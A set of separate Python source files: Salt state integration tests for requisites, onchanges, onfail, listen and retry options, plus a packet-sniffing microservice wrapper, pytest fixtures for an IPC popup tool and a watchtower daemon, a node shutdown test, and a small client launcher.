ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
        # if chain-use is added after #8774 is resolved, these tests may become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
        # First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
        and resolve the magic ``names`` state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
        and resolve the magic ``names`` state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
        test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
        test a state with the retry option that should return True after at least 4 retry attempts
        but never reach 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
        Previously, the order option, when used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
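        # Illustrative sketch of the scheme described above (not the exact Salt
        # implementation):
        #     import hashlib
        #     cache_name = hashlib.sha1(tag.encode()).hexdigest()
        # which always yields a 40-character filename, no matter how long the tag is.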
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
        helper method to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
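    # For example, self._add_runtime_pillar(pillar={'test': True}) writes a
    # pillar.sls containing "test: true", targets it at '*' via the top.sls above,
    # and refreshes pillar so the following state runs see test=True.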
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
        test state.sls_id when test is set to
        true after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
        test state.sls_id when test=True is passed as an
        arg after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
        test the output from running an echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
sniffing_service.py
|
from __future__ import absolute_import
import os
import sys
import time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
import threading
from threading import Lock
from topology.sniffer.daemon import SniffingDaemon
from topology.sniffer.devices import open_connection
from service.components import Component
from service.server import Server
from service.server import config
class PacketExporter(Component):
"""
Component used to export packets.
The packets that are taken from the list of shared packets are then
discarded from the list of shared packets.
"""
def __init__(self, shared_packets, lock):
self.shared_packets = shared_packets
self.lock = lock
def process(self, unused=None):
"""
:return: returns a list of packets as a dictionary
"""
self.lock.acquire()
packets = self.shared_packets[:]
self.shared_packets[:] = []
self.lock.release()
return packets
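# Minimal usage sketch (hypothetical packet payloads), assuming the sniffing
# daemon appends packet dicts to the same shared list under the same lock:
#
#     lock = Lock()
#     shared = [{"src": "10.0.0.1", "dst": "10.0.0.2"}]
#     exporter = PacketExporter(shared, lock)
#     exporter.process()  # returns the packet dicts and leaves `shared` empty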
class SniffingService():
"""
Wrapper over:
- the server with a PacketExporter component
- the shared_list of packets and the shared_lock
Shares the `shared_list` of packets with the sniffing daemon.
"""
def __init__(self, device):
shared_lock = Lock()
shared_list = []
self.server = Server("sniffer", config["sniffer"])
self.server.add_component_get("/newpackets",
PacketExporter(shared_list, shared_lock))
if device is None:
self.daemon = SniffingDaemon(shared_list, shared_lock)
else:
self.daemon = SniffingDaemon(shared_list, shared_lock, connections=open_connection(device))
def sniffing_service(device=None, filter_mask=None):
"""
Function used to start the sniffing microservice.
"""
service = SniffingService(device)
threading.Thread(target=service.server.run).start()
if filter_mask is not None:
threading.Thread(target=lambda: service.daemon.run(filter_mask)).start()
else:
threading.Thread(target=service.daemon.run).start()
    # Keep the main thread alive; the server and daemon run in their own threads.
    while True:
        time.sleep(1)
if __name__ == "__main__":
sniffing_service()
|
conftest.py
|
import pytest
import math
@pytest.fixture(scope='function')
def IpcServer():
from gpopup import ipc
from random import randint
val = ipc.Server._default_sock_name()
rando = '_' + '{:d}'.format(randint(0, int(1e6)))
class _IpcServer(ipc.Server):
@classmethod
def _default_sock_name(cls):
return val + rando
return _IpcServer
@pytest.fixture(scope='function')
def echo_client(IpcServer):
Client = IpcServer.get_client()
c = Client()
c.start_server_maybe()
yield c
c.kill_server()
@pytest.fixture(scope='function')
def MathServer(IpcServer):
class _MathServer(IpcServer):
def cmd_cos(self, *pargs, **kwargs):
return math.cos(*pargs, **kwargs)
def cmd_erf(self, x):
"Calculate the error function of x"
return math.erf(x)
return _MathServer
@pytest.fixture(scope='function')
def math_client(MathServer):
Client = MathServer.get_client()
c = Client()
c.start_server_maybe()
yield c
c.kill_server()
@pytest.fixture(scope='function')
def message_types():
from gpopup import message_types
return message_types
@pytest.fixture(scope='function')
def gpopup_server():
from subprocess import Popen
p = Popen(['gpopup-server', '--force-bind'])
yield p
p.terminate()
p.kill()
@pytest.fixture(scope='function')
def notifier_server():
from gpopup.notifier import NotifierServer
from threading import Thread
t = Thread(target=lambda: NotifierServer().run(background=False))
t.start()
yield t
t.join(timeout=2.0)
@pytest.fixture(scope='function')
def notifier_client(notifier_server):
from gpopup.notifier import NotifierClient
c = NotifierClient()
yield c
c.kill_server()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Zelantus Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test zelantusd shutdown."""
from threading import Thread
from test_framework.test_framework import ZelantusTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock(5000)
assert_equal(block['height'], 0)
class ShutdownTest(ZelantusTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
launch_two.py
|
from server import Main as Server
from tkinter.font import Font
from random import randint
from tkinter import *
import threading
import socket
import select
from client import Main as client
from time import sleep
def StartClient1():
main1 = client()
def StartClient2():
main2 = client()
threading.Thread(target=StartClient1).start()
StartClient2()
|
conftest.py
|
import os
import shutil
import pytest
from time import sleep
import multiprocessing
from grpc import RpcError
from multiprocessing import Process
from teos.teosd import main
from teos.cli.teos_cli import RPCClient
from common.cryptographer import Cryptographer
from test.teos.conftest import config
multiprocessing.set_start_method("spawn")
# This fixture needs to be manually run on the first E2E.
@pytest.fixture(scope="module")
def teosd(run_bitcoind):
teosd_process, teos_id = run_teosd()
yield teosd_process, teos_id
# FIXME: This is not ideal, but for some reason stop raises socket being closed on the first try here.
stopped = False
while not stopped:
try:
rpc_client = RPCClient(config.get("RPC_BIND"), config.get("RPC_PORT"))
rpc_client.stop()
stopped = True
except RpcError:
print("failed")
pass
teosd_process.join()
shutil.rmtree(".teos", ignore_errors=True)
    # FIXME: wait some time, otherwise it might fail when multiple e2e tests are run in the same session. Not sure why.
sleep(1)
def run_teosd():
sk_file_path = os.path.join(config.get("DATA_DIR"), "teos_sk.der")
if not os.path.exists(sk_file_path):
# Generating teos sk so we can return the teos_id
teos_sk = Cryptographer.generate_key()
Cryptographer.save_key_file(teos_sk.to_der(), "teos_sk", config.get("DATA_DIR"))
else:
teos_sk = Cryptographer.load_private_key_der(Cryptographer.load_key_file(sk_file_path))
teos_id = Cryptographer.get_compressed_pk(teos_sk.public_key)
# Change the default WSGI for Windows
if os.name == "nt":
config["WSGI"] = "waitress"
teosd_process = Process(target=main, kwargs={"config": config})
teosd_process.start()
# Give it some time to bootstrap
# TODO: we should do better synchronization using an Event
sleep(3)
return teosd_process, teos_id
def build_appointment_data(commitment_tx_id, penalty_tx):
appointment_data = {"tx": penalty_tx, "tx_id": commitment_tx_id, "to_self_delay": 20}
